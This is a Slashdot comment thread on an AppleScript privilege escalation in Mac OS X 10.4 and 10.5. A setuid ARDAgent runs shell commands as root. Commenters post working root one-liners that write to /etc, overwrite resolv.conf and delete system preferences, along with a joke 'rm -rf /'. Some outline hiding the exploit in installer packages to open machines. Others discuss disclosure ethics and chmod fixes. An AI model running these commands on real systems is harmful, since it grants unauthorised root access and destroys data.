Mac OS X Root Escalation Through AppleScript

An anonymous reader writes "Half the Mac OS X boxes in the world (confirmed on Mac OS X 10.4 Tiger and 10.5 Leopard) can be rooted through AppleScript: osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; Works for normal users and admins, provided the normal user wasn't switched to via fast user switching. Secure? I think not." On the other hand, since this exploit seems to require physical access to the machine to be rooted, you might have some other security concerns to deal with at that point, like keeping the intruder from raiding your fridge on his way out.

ARDAgent is Apple Remote Desktop

[dch24]

ARD = Apple Remote Desktop You can remove it by following these instructions.

Re:ARDAgent is Apple Remote Desktop

[JustCallMeRich]

That's nice. Now if my users disable ARD - I can't manage them anymore.

Most of my users who are smart enough to know HOW to do this, will know better not to. But there are a few who will just see this as a chance to 'unplug' from corporate management, without admin rights, and unable to get any software updates from Apple which may fix this...

Re:ARDAgent is Apple Remote Desktop

[palegray.net]

BTW, let's all thank Timothy, Pudge, and the rest of the /. gang for ensuring a fresh crop of zombie spambots, shall we? What happened to common courtesy? I thought etiquette dictated giving the manufacturer a heads up and a little time to fix their shit. I guess the ad dollars and attention whoring was just too much too resist. Enjoy your blood money fellas, the internet will suck just a little bit more thanks to you guys. Seeing as how your username is "MacDork" I've just gotta ask: would you feel the same way if this article described a Windows exploit?

Also, who says Apple wasn't notified of this problem in advance? I'm not saying they were or weren't, but I don't have data either way. This is the same community that loves to lambast Microsoft for their security issues (rightly so, in most cases), but fully supports immediate disclosure of exploits before patches are released by Microsoft (although MS has taken forever to fix many problems). As a network admin, I'm a fan of full disclosure, which gives the ability to do something about the issue until a patch is released. Others see things differently.

Re:ARDAgent is Apple Remote Desktop

[MacDork]

would you feel the same way if this article described a Windows exploit?

Yes, of course. Do you think I enjoy having my inbox overflow with spam because of the Windows worm du jour?

Also, who says Apple wasn't notified of this problem in advance? I'm not saying they were or weren't, but I don't have data either way.

I did and you obviously don't have any information to dispute it.

As a network admin, I'm a fan of full disclosure, which gives the ability to do something about the issue until a patch is released.

Don't be so juvenile. There's a huge difference between being notified on a security mailing list and having the information plastered on the front page of slashdot. A real professional would know that.

Re:ARDAgent is Apple Remote Desktop

huge difference between being notified on a security mailing list and having the information plastered on the front page of slashdot

Black hats read security mailing lists. Keeping it off Slashdot only hinders innocent users from taking precautions against the defect.

Re:ARDAgent is Apple Remote Desktop

[alphaspeedgirl]

HI I just registered and Am relatively clueless but I have downloaded something like this, or not that is 'eating up' my hard drive. It is a MacBook Pro with 4GB of Ram and ~120GB hard drive and now with only 33GB on there it is telling me that it has 86 MB free. I have backed up and will do a clean install but if anyone can help a non geek but fairly savvy Macophile I would appreciate not having to do the install. I tried to run the script on the link in this thread but it read syntax error HELP

Re:ARDAgent is Apple Remote Desktop

[aeiah]

this is by far the strangest comment ive ever read on slashdot

Re:ARDAgent is Apple Remote Desktop

[Kantara]

Under normal circumstances, users don't need access to terminal at all. Instead of trying to mess with ARD, you could just either deny terminal as an app in Workgroup Manager (If it's a bound client) or just simply move the terminal app to the local admin's Applications folder. This prevents Repair Permissions from 'fixing' anything and still allows ARD to do it's job.

Re:ARDAgent is Apple Remote Desktop

[Joseph_Daniel_Zukige]

If you are not trolling, or even if you are, don't try to avoid the inevitable.

Once your box is rooted, it's not worth the trouble of trying to clean it out. You can't know where they've hidden every last one of their fallback trojans, so it's only a matter of time before you're rooted again.

Re:ARDAgent is Apple Remote Desktop

[Ilgaz]

Your users shouldn't have power to disable ARD I think or better, enable SSH. I mean they should be normal user instead of Administrator.

Re:ARDAgent is Apple Remote Desktop

[mzs]

Sure they may not be admin users but now they can disable ARD if they wish:

osascript -e 'tell app "ARDAgent" to do shell script "rm /Library/Preferences/com.apple.RemoteManagement.launchd"'

Heck they might as well use ed to become a sudoer, I won't detail that.

Re:ARDAgent is Apple Remote Desktop

[palegray.net]

One. Last. Time. I never made the assertion that Apple was warned. I noted that we don't have information either way from the source material (as in, Apple has not publicly stated that they weren't warned, nor have they acknowledged any sort of prior warning).

I'm sorry if you feel offended by Slashdot's editorial policies, but here's some harsh reality for you: I'm certain they don't give a flying fuck what you think.

Either you're completely incapable of reason, or you're a rather effective troll. Or both.

Re:ARDAgent is Apple Remote Desktop

[snoyberg]

If you want to really clean up diskspace, try:

sudo rm -rf /

..., just kidding, don't really do that. I did have a point for this troll: if someone posts code and tells you to run it, don't do it if you don't understand what you're running

Re:ARDAgent is Apple Remote Desktop

[Cmdr-Absurd]

According to intego, this exploit does NOT work if ARD has been activated via the sharing preference pane. So in a typical lab situation, the exploit will not work b/c the admin used ARD to do admin things (like send shell script commands to all the lab machines in parallel.) Home users typically don't turn ARD on, and thus would be vulnerable, but home users typically trust everyone using their systems. Most of the exploits perpetrated via this vector will likely be by children who want to disable parental controls.

Re:ARDAgent is Apple Remote Desktop

[JustCallMeRich]

Yes - they should be normal users. But until corporate buys into that and approves the project to put some standards on the Macs, I get to deal with BS like that. At least they got me around to put the ARD client on the 600+ Mac users across about 15 sites in the USA.

One step at a time.

Anyone have any Mac Admin jobs opening soon??

Re:ARDAgent is Apple Remote Desktop

[JustCallMeRich]

Nice - that will help.

Just for the record, I'm in a corporate environment.

Re:ARDAgent is Apple Remote Desktop

[gumbi+west]

according to WaPo Apple has known about this for quite a while

Physical access?

[Menkhaf]

Could somebody explain how running a script requires physical access?

Re:Physical access?

[Medieval_Gnome]

This does not work over ssh, at least not if you user isn't also logged in physically to the machine. If you try over ssh, it gives the error

_RegisterApplication(), FAILED TO establish the default connection to the WindowServer, _CGSDefaultConnection() is NULL.

However, it does work if you have a remote desktop view into a machine.

Re:Physical access?

[Medieval_Gnome]

Try sshing into a machine where your user isn't currently logged in, or running the exploit as a different user. As best I can tell, it doesn't work in the case where the user running the command isn't the user who is graphically logged in.

Re:Physical access?

[pudge]

The AppleScript requires an account to be logged in at the console. Granted, it's possible to also do that remotely, but you still need to have the console avilable via VNC etc.

Re:Physical access?

You don't need any sort of remote login, all you need is a client (web browser, Quicktime, Flash, etc.) buffer overflow that you can use to start a shell...

Re:Physical access?

[MyDixieWrecked]

I just SSHed to my laptop and succesfully tested the above command.

I can't seem to get this to work. Not only does Applescript tell me that ARDAgent is not scriptable (when I tried to open it's scripting library: /System/Library/CoreServices/RemoteManagement/ARDAgent.app), but it also spit back this error:

ARDAgent got an error: "whoami" doesn't understand the do shell script message.

running the script on the commandline returns this:

spikedesktop:Library spike$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
23:47: execution error: ARDAgent got an error: "whoami" doesnâ(TM)t understand the do shell script message. (-1708)

I'm running OSX 10.5.3 Intel.

Re:Physical access?

[pudge]

A terminal isn't enough? Correct.

Re:Physical access?

[MyDixieWrecked]

Actually... interesting.

I wasn't switched to via fastuserswitching, but I do lock my screen. that seems to have an impact on it, too.

I ssh'd into my box at home and running this was successful.

fwiw, osascript doesn't work if the user isn't logged into aqua. I've tried writing volume controller scripts and I tried scripting Unison and other applications and they don't work if you're not logged in physically at the machine.

So basically, an exploit would need to be fired by the user or by something the user did (ie: surf to a website).

This is interesting.

Re:Physical access?

[generica1]

Same here, across multiple machines/configurations/architectures (PPC/Intel).

Wonder what we are doing differently?

Re:Physical access?

[Henriok]

I got this exact result to. 10.5.3/Intel, ARD activated.

Re:Physical access?

This is so obviously true I can't believe there are people in this discussion suggesting this isn't a serious problem, or a real and actual problem with the OS security model. These sorts of problems happen all the time with all sorts of OSs so the problem is not unique--this does not obviate it's severity however.

MacOS has a serious security issue here, basically for-free privilege escaltion. This means running this OS with this vulnerability unpatched is equivalent to running as 'Administrator' on Windows, or root on *nix. This is always considered a 'bad thing'. Being loged into the MacOS as a regular user is now a 'bad thing', just like default accounts for WindowsXP.

Re:Physical access?

[tverbeek]

A remote terminal session doesn't get you access to the OS X GUI, which is where AppleScript is found.

Re:Physical access?

[jpellino]

Right - which means ARD admin access would work using the remote control feature, and presumably Leopard Screen Share would be just as good - again, you have to be a legit user with the same access as an ARD admin. Which needs to be a very well guarded and secure username/password. We got read the riot act about this at the last Apple EDU update.

If someone nasty has ARD admin or (presumably) Leopard share access to a legit user on your machines, you likely already have far more problems than this one exploit.

I'll try through Leopard share on campus in the morning.

Re:Physical access?

[Firehed]

True. But presumably you could write the script in any of the command-line editors and save it to the desktop or something, at which point the user could click on it.

Not that it matters. If you have that level of access, you're already in a position to do more damage than what you could do through this exploit, by the sounds of it.

Re:Physical access?

[pudge]

I logged in via SSH to an Xserve I admin and I got the same response... 'root'. I doubt it, unless the user you logged in as was logged into the console already ...

Re:Physical access?

[JustCallMeRich]

So.... This is already fixed? Just an ARD update and everything goes away? Nice. I'm pushing the ARD update out tomorrow.

Re:Physical access?

[v1]

osascript runs under the windowserver of whatever user is logged in. So you can do an osascript command from a shell so long as any user is logged into the GUI. (Finder) Probably will not work if fast user switching is enabled and it's at the login window even though a user (or users) are logged in. So yes it will work remotely, if you have an ssh login and ssh is enabled. Doesn't look like ARD service itself needs to be on, which is puzzling. Too bad that, since 99% of macs have this service off. (is off by default)

Would be nice if someone would have reported this instead of releasing it into the public the instant they found it. Apple has a pretty good track record of releasing security fixes for things like this asap. Look for a security update in softwareupdate in the next day or two. (if that) From the looks of it, there will be validation on the source of the applescript or they may just turn off scripting for that ARD component altogether.

Fortunately, on top of having very few such exploits come up, it's that much harder on the mac to get malicious code running in the first place, drive-by downloads and email-auto-execute are the main vectors for a worm to spread with this sort of payload, and those generally aren't possible either. Breaking the chain of disaster is more effective if you are concentrating on more than one of the links.

Re:Physical access?

[mini+me]

Same result here. 10.4.11 PPC.

I do have fast user switching enabled, but I have not switched or logged out of my current account since the last reboot. Perhaps having it enabled is enough?

Re:Physical access?

[Jasin+Natael]

The user wouldn't need to do anything. If you log in via SSH as a limited user, you could (theoretically) use OS X's "open" command to launch the file as if it was clicked, from anywhere in the filesystem. The catch is that your SSH login must be the current user of the Window Server (locally logged-in).

Re:Physical access?

[Tokerat]

I'm going to burn some mod points and ask why this isn't possible if you SSH into an OS X box. It's fair to link to an explanation if I've missed something, and no, this is not typical sarcastic geek doubt, I'd genuinely like to know.

Re:Physical access?

[beelsebob]

But presumably you could write the script in any of the command-line editors and save it to the desktop or something, at which point the user could click on it.
No, because unix permissions ensure that you can't write to other people's home directories (where their Desktop folder is).

Re:Physical access?

[Macka]

You can do this either by logging in normally and opening up a Terminal window to get a shell prompt; or by logging in remotely using remote desktop & opening a Terminal window to get a shell prompt; or by logging in remotely using SSH to get a shell prompt.

The latter doesn't need any desktop login on OS X at all. Could be done from a Linux box, or even a Windows box using Putty. Providing "remote login" is enabled in System Prefs on the Mac of cause and the remote user has access to a local account.

Re:Physical access?

[raynet]

Actually it doesn't seem to require that, the script also works even if I have VNC access disabled. It doesn't seem to work if I try to shell_exec() it from PHP page though. But ssh-access is enough to root a mac now, great.

Re:Physical access?

[Tomas_Bakke]

I have remote access enabled.
However you need to spoof the correct IP and MAC address after portknocking with cryptographic hashes and attempt-limiting enabled. With some extra black magic on top of that you're NAT'ed to the login of the OSX machines in the LAN. Yes, I have some Macs in my LAN.

Re:Physical access?

[StatusWoe]

I think the point is that if you compromise a user (non-root) account you can create a script that if they click ( hmm, what's this Doom 3 shortcut?) would be able to execute your commands as root.

The idea being that not everyone is a root user FOR A REASON. /n

I could be mistaken of course.

Re:Physical access?

[kigrwik]

AppleScript doesn't work on a purely SSH connection.

Re:Physical access?

[Ilgaz]

I alerted a developer about a similar theoretical issue (written on a blog) hitting his program on OS X, he thanked me and he said he will fix it to prevent negative press while one would have much more serious problem if someone sits on his chair issuing commands.

I guess this exploit is similar too and I bet Apple will either take it serious or won't bother shipping a hotfix at all.

I bet they will run a "troll meter" like thing to decide :)

Re:Physical access?

[pudge]

No, again, you need the account you're using to be logged into the console, one way or another. If you are logged in as "gandalf" on the console, then you can run this script as "gandalf" over ssh, but not as "frodo."

Of course, you can run it as "root" over ssh, but that kinda defeats the purpose!

Re:Physical access?

[mzs]

AppleScript doesn't work on a purely SSH connection.

Sure it does, but if you are not the same user as the user logged into the console you get this message:
$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
kCGErrorRangeCheck : Window Server communications from outside of session allowed for root and console user only
INIT_Processeses(), could not establish the default connection to the WindowServer.Abort trap

I guess you could be the root user as well but that sort of defeats the purpose.

Re:Physical access?

[Sentry21]

Unless the user that you're logged in as is also logged in physically, in which case you can access WindowServer and thus ARDAgent will do its thing.

Re:Physical access?

[DiLLeMaN]

Mini:~ max$ ssh max@emac.local
Password:
Last login: Thu Jun 19 03:37:58 2008
eMac:~ max$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
root

Come again? Even though the eMac is sitting right next to the mini, there's no VNC or other screen sharing running. Screen sharing IS switched on, though. If I switch it off, the exploit still works. Remote management is switched off the entire time.

Re:Physical access?

[pudge]

Mini:~ max$ ssh max@emac.local
Password:
Last login: Thu Jun 19 03:37:58 2008
eMac:~ max$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"';
root

Come again? Even though the eMac is sitting right next to the mini, there's no VNC or other screen sharing running. I presume you missed the part where I said "The AppleScript requires an account to be logged in at the console," and that "max" is logged in at the console of the eMac.

Re:Physical access?

[mobius8]

couldn't you release a script online that runs this command, elevates the user to root, disables the firewall, enables vnc and then sends you a message letting you know that the machine is now open for the season? I don't know how many people look at scripts that they download, but I am sure there a quite a few who would download a script that claims it does something involving itunes. They wouldn't even look at what it does, and their machine would be "penetrated" btw, that was funny as hell.

Re:Physical access?

[raynet]

Hmm, but I tested this. I booted up my Mac Mini and didn't log in. I could SSH the machine and run the script and got root access.

Physical access? Have you heard of malware?

[jeffmeden]

On the other hand, since this exploit seems to require physical access to the machine to be rooted, you might have some other security concerns to deal with at that point, like keeping the intruder from raiding your fridge on his way out. Malware arguably (one of the greatest scourges of modern computing) spreads by just that, local root vulnerabilities (also known as 'standard procedure' in the Windows community). What makes this exploit so useless, given that all the perpetrator has to do is send it out to enough people hoping just a few will run it?

It seems perfectly serious since one of the main security aspects of OS X is that root access is held sacred (as it should be) and malware is assumed to be 'stopped at the gate' by that policy.

Physical access?

[fyleow]

I'm not familiar with AppleScript but that doesn't sound like it requires physical access to me. Can't you SSH or remote desktop into an OS X server and run that command to get root access? That seems like a serious vulnerability to me.

Re:ARDagent

[Medieval_Gnome]

I might be misinterpreting you, so I apologize if I am. However, it sounds like you're saying that in order to have this code work, "Screen Sharing" needs to be enabled in the Sharing preferences. This is not true.

Even as a normal user on my mac, the exploit code works.

It's the same marketing mistake as Microsoft.

[pandrijeczko]

Yes, I fully accept that an exploit requiring physical access to a machine is a much lower security risk than one that can be carried out from a remote location.

But Apple have made exactly the same marketing mistakes that Microsoft did in selling their respective OSes as ones that can be used easily by people with no knowledge of computers - people still click on attachments they shouldn't, still give their passwords to phishing web sites and still don't install regular security updates and scan their PCs for virii.

And in the case of this specific exploit, I am sure that a number of newbie Apple users would happily tap in "osascript -e 'tell app "ARDAgent" to do shell script "whoami"'" into their computers purely because "Jim The Friendly Computer Support Engineer" told them to do it.

So let's not beat about the bush - ANY exploit that isn't fixed as quickly as possible is a problem because there's always at least one spotty teenager trying to become a HAX0R who is prepared to try his luck against some poor unwitting user.

Re:It's the same marketing mistake as Microsoft.

[pudge]

So let's not beat about the bush - ANY exploit that isn't fixed as quickly as possible is a problem because there's always at least one spotty teenager trying to become a HAX0R who is prepared to try his luck against some poor unwitting user. Agreed. That's probably why it was posted. I think if timothy thought this was nothing to care about, it wouldn't have been. :-)

Re:It's the same marketing mistake as Microsoft.

[Colonel+Fahlt]

(Not to mention we might not be talking about "poor unwitting users", we might be talking about a user in a business context who's not supposed to have root privileges but can suddenly grant themselves the ability to do things they're not supposed to. What's that statistic about security breaches from the inside of a company?)

Re:It's the same marketing mistake as Microsoft.

[Lars+T.]

And in the case of this specific exploit, I am sure that a number of newbie Apple users would happily tap in "osascript -e 'tell app "ARDAgent" to do shell script "whoami"'" into their computers purely because "Jim The Friendly Computer Support Engineer" told them to do it. Suuure, it would be so easy to tell a "newbie Apple user" to go to Applications/Utilities/, start "Terminal" and then type something. I have a hunch it would be way easier to just tell them (or a newbie Linux user) to download "Malware.app/rpm" and simply run it. When you can social engineer somebody, don't make it too fucking complicated just to prove a stupid point - or he might just ignore you.

Re:It's the same marketing mistake as Microsoft.

[pandrijeczko]

With all respect, somebody who has got down to the level of installing RPMs at the BASH prompt has probably already started the steep learning curve that takes them away from being a newbie user - so therefore your own analogy is a total fallacy.

And can I suggest that before you respond to me any more, you Google "Kevin Mitnick" and "The Badir Brothers" so you can read up some articles on social engineering to become more informed in the subject?

As someone who works in security on telephony servers, I would be totally remiss in my job if I excluded any security vulnerability just because it's "too fucking complicated" to engineer - sure, some vulnerabilities are less risky than others but they are ALL risks.

Oh, and stop being so tetchy just because I DARE criticise Apple... Guess what? Microsoft fucks up occasionally, Red Hat and Ubuntu fuck up occasionally, so do Apple. So get used to it.

Re:It's the same marketing mistake as Microsoft.

[ArAgost]

And in the case of this specific exploit, I am sure that a number of newbie Apple users would happily tap in "osascript -e 'tell app "ARDAgent" to do shell script "whoami"'" into their computers purely because "Jim The Friendly Computer Support Engineer" told them to do it. This is not an exmple of exploiting, this is social engineering (or SPARTA!, I never remember). The same way they could happily type rm -rf / (don't try this at home) because Jim the still friendly but not so useful now Engineer told them.

Re:It's the same marketing mistake as Microsoft.

[Lars+T.]

http://www.rpm.org/software/gui/

Re:It's the same marketing mistake as Microsoft.

[Lars+T.]

But anyway, thanks for pointing out how complicated installing software on Linux is.

Physical access?

[Moridineas]

On the other hand, since this exploit seems to require physical access to the machine to be rooted It does? Am I missing something? I just SSHed to my laptop and succesfully tested the above command. So remote shell access works. Clever people could probably figure out some other ways of triggering an applescript to run without there being any physical machine access, I don't know.

Admittedly most OS X users probably don't have any kind of remote shell access enabled, but this does seem to be a problem...

Re:Only need a shell....

[pudge]

Many people have sshd running as well, so it doesn't quite have to be local. Just need a shell.

Verified, on my Leopard box. SSH'ed to it and rooted it (I was able to touch a file in a root-only directory)

Nope. You cannot do it via SSH unless that account is already logged in physically, at the console.

[pudge@bourque ~]$ ls -l /etc/test1
ls: /etc/test1: No such file or directory
[pudge@bourque ~]$ touch /etc/test1
touch: /etc/test1: Permission denied
[pudge@bourque ~]$ osascript -e 'tell app "ARDAgent" to do shell script "touch /etc/test1"'
[pudge@bourque ~]$ ls -l /etc/test1
-rw-rw-rw- 1 root wheel 0 Jun 18 11:27 /etc/test1

versus:

[pudge@bourque ~]$ ssh maintenance@localhost
bourque:~ maintenance$ ls -l /etc/test2
ls: /etc/test2: No such file or directory
bourque:~ maintenance$ touch /etc/test2
touch: /etc/test2: Permission denied
bourque:~ maintenance$ osascript -e 'tell app "ARDAgent" to do shell script "touch /etc/test2"'
_RegisterApplication(), FAILED TO establish the default connection to the WindowServer, _CGSDefaultConnection() is NULL.

MOD PARENT DOWN

[Moridineas]

Other reply -- Medieval_Gnome -- is absolutely correct. Unless you've DELETED by hand the Apple Remote Desktop files, the exploit works. I do not have ARD enabled, and the exploit works.

Re:MOD PARENT DOWN

[e+r+i+k+0]

It's not necessary to delete ARDAgent.app. Just remove the setuid bit of the actual executable with the following command:

sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

Re:Can we get some sources?

who needs a source, it works. tried on my mac, output is: root

so i tried replacing "whoami" with "rm -rf /" and

!@#ca$a%H&(
+++NO CARRIER

not a full exploit, yet

[rritterson]

Okay, so I tested it and the whoami returns 'root'.

However, I also logged out of my account and into an account that has no permissions to access my regular home directory (normally I log in with short name "me"), then ran:

osascript -e 'tell app "ARDAgent" to do shell script "touch /Users/me/Downloads/test.txt"'

It doesn't do anything for a long time, and then returns

execution error: ARDAgent got an error: AppleEvent timed out. (-1712)


Same thing happens if I bundle the command into a sh file and try to execute that instead. I am not a hacker, but it would seem, at least at first glance, that ARDAgent is not entirely privileged.

Re:not a full exploit, yet

[rritterson]

Actually, the above only occurs as I had 'su'ed to another user, then ran the above command. If, instead of using su I simply try to touch a file in the second account, it works just fine. So I retract the above.

Re:not a full exploit, yet

[rthille]

hmmm, logged into the console, and ssh'd in, with the screensaver locking the screen, I get 'AppleEvent timed out'.
when I unlock the console and then immediately retry the osascript invocation, I get 'Connection is invalid', after a long delay.
after that one (which takes ~30 secs or more), then the following one returns 'root'

Wonder why the delay before it works, since as soon as the screen locks due to idle, it stops working again...

Re:not a full exploit, yet

[DrStrangeLoop]

thats propably because you had ARD running at that time (ie as a client program to access another machine). in that case it doesnt work. if there is no ARDAgent process when the osascript is run, it should work.

Re:ARDagent

[Barrie_rdv]

Not really, I didn't turn on Remote Desktop Sharing, but I get the same output...

This is a serious privilege escalation bug, but...

[argent]

First, yes, this is a serious bug. It's a classic blunder, like getting into a land war in Asia, and is similar to the in NT3.51's scheduler to get LOCALSYSTEM rights, or the one in /bin/write in 2BSD to get a root shell.

It's also easy to fix.

And I am about 99 44/100 percent sure that there's more undiscovered holes like this in OS X, Windows Vista, and any random Linux desktop you could name.

THe thing is, it's not true that "one of the main security aspects of OS X is that root access is held sacred (as it should be) and malware is assumed to be 'stopped at the gate' by that policy". It's not. You can protect the OS from the malware, but the malware can still hide, still restart itself after a reboot, and still destroy everything you actually CARE about without root access. And malware can similarly break out of Vista's jail around IE, and whatever APple does along those lines.

Security is like sex. Once you're penetrated you're ****ed.

The biggest advantage that Apple has is that Safari doesn't (any more) have a mechanism (at least not by default) to blithely execute outside a *closed* sandbox (not a leaky one) any random malware that can convince it that it's safe and trusted. That's the biggest security problem Windows has. ActiveX and all its kin. It's harder to penetrate OS X in the first place... you pretty much have to depend on social engineering... and people CAN learn not to be social-engineered.

Yes, but does it run on Linux^H^H^H^H^H

[davidwr]

Yes, but does it run on Linux^H^H^H^H^Hcoffee-makers?

Re:Yes, but does it run on Linux^H^H^H^H^H

[f8l_0e]

Yes, but only on the "iCoffee Touch" line of coffee machines.

Insecure root-owned binaries on unix?

Never!

It does not matter if the service is enabled or not, osascript will execute the application for you.

It's not like we don't have a simple workaround:
sudo chmod 000 /System/Library/CoreServices/RemoteManagement/ARDAgent.app

Perhaps you might consider evaluating the rest of the .app directories and /usr/bin and /usr/sbin for suid-type binaries which should be removed or disabled if you in any-way allow third-parties to execute local commands -- or are just paranoid.

Re:Insecure root-owned binaries on unix?

[Charles+Dodgeson]

That's it:

% ls -l /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/
-rwsr-xr-x 1 root wheel 1439952 Nov 15 2007 ARDAgent

Time to run find(1) to see if there are any other things like this.

And, I should say, as a so-call Apple fanboy, I am deeply embarrassed. It's been decades that people have known to watch out for stuff like this.

Re:Insecure root-owned binaries on unix?

[clang_jangle]

As I and others have posted, it doesn't work on our machines. But just yesterday I used Disk Utility from the installer DVD to fix permissions on this machine, as I was having a little bugginess after doing a MacPorts rsync and became suspicious about that. There were indeed some funky permissions corrected in /opt/local/bin,/opt/local/lib, and /usr/local/lib. Maybe that;s why it doesn't run on my machine? Mine is powerpc running 10.4.11.

Re:Insecure root-owned binaries on unix?

[Enoxice]

every operating system under the sun

Guess it's time to try Solaris again...

Re:This is a serious privilege escalation bug, but

[Bert64]

No, what's good about Linux, and to a slightly lesser extend OSX, is that Unix is an incredibly simple system at it's core, so there are relatively few possible exploitation vectors and they are all well understood.

Re:Physical access? Have you heard of malware?

[Thalagyrt]

Read replies to post above. I've also myself tested it on a machine with ARD disabled. Works just fine.

Re:Physical access? Have you heard of malware?

You do realize that the comment you linked is dead wrong and it does in fact work on OSX out-of-the-box, right? I just tried it on my macbook pro which has Leopard and I have made no modifications to it. It works.

Re:Physical access? Have you heard of malware?

[Goaway]

Malware arguably (one of the greatest scourges of modern computing) spreads by just that, local root vulnerabilities No, it does not. Most malware doesn't need root to do most of the things it wants to do. Having root opens up some more possibilities, but it is by now means required.

Re:Only need a shell....

[t-maxx+cowboy]

I have confirmed the above assessment by 'pudge', that in order for the exploit to work, an account that is logged into the console, needs to be utilized from an SSH connection.

Tested it my self remotely.

Re:ARDagent

[generica1]

My apologies. There was no article sourced in the posting and I couldn't recreate the exploit on any of the Macs in my house via SSH *or* with local physical access via Terminal.app. I kept getting:

23:47: execution error: ARDAgent got an error: "whoami" doesn't understand the do shell script message. (-1708)

No matter whether I tried ssh from remote, or local console bash.

Tested on a MacBook Pro running 10.5.3, an iBook running 10.4.11 and a g5 PPC OS X Server running 10.4.11 (Server build).

So....YMMV....

Re:This is a serious privilege escalation bug, but

[Applekid]

. . . It's a classic blunder, like getting into a land war in Asia . . . 99 44/100 percent . . . Security is like sex. Once you're penetrated you're ****ed. You are now my new favorite poster.

Proof of Concept Possibilities

[AgentOJ]

This code could easily be wrapped into the preflight scripts for an Installer package in OS X, or integrated into any piece of malware to escalate itself to root without any user interaction beyond downloading it and launching it. In this sense, the arguments against the DNSChanger Trojan Horse of "it requires an admin password to be installed" becomes null and void. This is fairly serious, folks. One-click privilege escalation is way too easy for script-kiddies and professional malware distributers alike to integrate into their nasty programs.

Re:Proof of Concept Possibilities

[kc8apf]

Disclaimer: I'm an Apple employee who handles software packaging (i.e. creating Installer packages) from time to time.

If you've never noticed, when an Installer package in OS X includes a preflight or postflight script, the installer puts up a warning dialog that a script will be run. It is also common that the Installer needs admin or root access to do the install. Thus, the installer asks the user to authenticate after which point the preflight and postflight scripts are run under admin or root privileges. If you want to do something nasty as part of an Installer package, you don't need a root-escalation scheme to do it. 90% of user will simply click "Continue" to the "Do you wish to run the script?" question and will authenticate simply because they are accustomed to those prompts when installing software.

Re:Proof of Concept Possibilities

[kc8apf]

The above isn't 100% accurate. The "Do you wish to run the script?" question is triggered by a VolumeCheck script. The javascript-based versions don't trigger this as they are run in a sandboxed environment. There is still the option to include a full executable, shell script or otherwise, however.

The preflight and postflight don't trigger any prompts for the user. The Installer asks for authentication depending on what the creator of the Installer package tells it is need. You could easily create an Installer package that "requires" root, contains a preflight that wipes the hard drive, and has a payload of nothing. To the person who tries to install your package, they only see the information you present to them and the prompt for their password.

Re:This is a serious privilege escalation bug, but

[smitty97]

And I am about 99 44/100 percent sure that there's more undiscovered holes like this in OS X, Windows Vista, and any random Linux desktop you could name.

I found another privelege escalation!

$ su
Password:
#

Quick Question

[Gewalt]

I can't get the script to successfully run anything other than "whoami". Has anyone else found this to actually be exploitable... or is this just a silly "hey lets make terminal output scary characters" game?

Re:Quick Question

[Charles+Dodgeson]

I've got it to run destructive things as an ordinary user without any need for authentication beyond being logged in

% osascript -e 'tell app "ARDAgent" to do shell script "echo Nasty Content > /etc/resolv.conf"' % cat /etc/resolv.conf
Nasty Content

Re:Quick Question

I got it to create a file and make it executable with setuid root.

Needless to say, I'm dismayed.

Re:Quick Question

[John+Betonschaar]

$ osascript -e 'tell app "ARDAgent" to do shell script "touch /tmp.tmp"'
$ ls -l /tmp.tmp
-rw-rw-rw- 1 root admin 0 Jun 19 11:19 /tmp.tmp
$ rm -rf /tmp.tmp
rm: /tmp.tmp: Permission denied

Seems pretty exploitable to me...

Re:Quick Question

[konohitowa]

All I get is this:

8323$ osascript -e 'tell app "ARDAgent" to do shell script "whoami"'
23:47: execution error: ARDAgent got an error: AppleEvent timed out. (-1712)

Re:Quick Question

[SythDot]

I get

23:47: execution error: ARDAgent got an error: "whoami" doesnÃÂÂ(TM)t understand the do shell script message. (-1708)

Re:Quick Question

[SythDot]

$ osascript -e 'tell app "ARDAgent" to do shell script "touch /tmp.tmp"'
23:55: execution error: ARDAgent got an error: "touch /tmp.tmp" doesnÃÂÂ(TM)t understand the do shell script message. (-1708)

Re:Quick Question

[gumbi+west]

when I do, "osascript -e 'tell app "ARDAgent" to do shell script "whoami"';" I get the reply, "root"

But then, the washington post's suggested fix, "osascript -e 'tell app "ARDAgent" to do shell script "chmod 0555 /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent"';" just gives, "ARDAgent: Operation not permitted (1)"

Suggesting the user changed for this command? This is on 10.4.11. But on one of my computers it worked only if I dropped the semi colon, and on the other it worked only with... odd

Re:I confirmed it to.

[Gewalt]

My IQ is 162 and I didn't get your joke. Just how smart do you have to be to get that one?

Re:ARDagent

I kept getting this. Out of luck, at one point it worked and I got "root"; after that, I kept getting only my regular user. Restarting /System/Library/CoreServices/RemoteManagement/ARDAgent.app made it give me root again, consistently.

Re:Only need a shell....

[That's+What+She+Said]

I tried some variations, but I still think this bug is serious enoguh that Apple should do something ASAP!

I tried substituting the "whoami" part for some other command, just like pudge did with "touch", and it worked...

I was thinking how someone could fool a user to execute these commands, but I didn't have success with other variantions.

A simple AppleScript like this won't work:

tell appplication "ARDAgent" to do shell script "touch /etc/whatever"

As stated by others, it won't work through ssh, but it wouldn't be wise to use ssh to attack a machine, anyways...

So, I think that the only way this will work is through a shell script. An easy trick:

1. Just create some stupid application that people would want to try and install and that looks unsuspicious;

2. Create an installation package, so it looks safe. In this package, use a script for "post-install work" that does whatever you want;

3. Put it up on the web or send through e-mail to your target and wait for them to execute the installer;

4. ???

5. Profit? Well, not necessarily, but...

Since the script will be quite well hidden in the installation package, the user will not suspect the nasty stuff going on in his/her system.

You can, for instance, edit sharing preferences, create a user, or just wreak havoc by deleting some essential system file. The sky is the limit...

Re:This is Arnold speaking

[sleigher]

I ain't got time to bleed....

stupid SUID

[tickell]

sudo chmod 755 /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent Sheesh ....

One more, maybe.

[bill_mcgonigle]

Time to run find(1) to see if there are any other things like this.

Assumptions:
AppleScripting is only applicable to .app's
"do shell script" is only a problem in the main binary, suid stuff in Resources/ isn't impacted.

Results:

%sudo find /System/ -type f -ls | grep ' -rws' | grep MacOS | grep '\.app'
